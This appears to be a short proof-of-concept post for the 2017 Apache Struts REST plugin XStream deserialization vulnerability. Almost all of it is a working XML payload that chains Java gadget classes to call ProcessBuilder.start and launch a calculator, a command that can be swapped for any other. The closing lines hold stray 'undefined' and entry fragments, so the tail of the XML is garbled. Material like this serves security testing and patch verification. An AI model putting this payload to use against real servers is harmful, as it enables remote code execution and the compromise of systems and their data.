PoC payload for lolstruts lolREST lolXML loldeserialization lolvulnerability [6th Sept 2017, as there'll be another tomorrow probably ffs]

payload.xml

<jdk.nashorn.internal.objects.NativeString>
	<flags>0</flags>
	<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
		<dataHandler>
			<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
				<is class="javax.crypto.CipherInputStream">
					<cipher class="javax.crypto.NullCipher">
						<initialized>false</initialized>
						<opmode>0</opmode>
						<serviceIterator class="javax.imageio.spi.FilterIterator">
							<iter class="javax.imageio.spi.FilterIterator">
								<iter class="java.util.Collections$EmptyIterator"/>
								<next class="java.lang.ProcessBuilder">
									<command>
										<string>/Applications/Calculator.app/Contents/MacOS/Calculator</string>
									</command>
									<redirectErrorStream>false</redirectErrorStream>
								</next>
							</iter>
							<filter class="javax.imageio.ImageIO$ContainsFilter">
								<method>
									<class>java.lang.ProcessBuilder</class>
									<name>start</name>
									<parameter-types/>
								</method>
								<name>foo</name>
							</filter>
							<next class="string">foo</next>
						</serviceIterator>
						<lock/>
					</cipher>
					<input class="java.lang.ProcessBuilder$NullInputStream"/>
					<ibuffer></ibuffer>
					<done>false</done>
					<ostart>0</ostart>
					<ofinish>0</ofinish>
					<closed>false</closed>
				</is>
				<consumed>false</consumed>
			</dataSource>
			<transferFlavors/>
		</dataHandler>
		<dataLen>0</dataLen>
	</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>undefined</entry>undefined<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>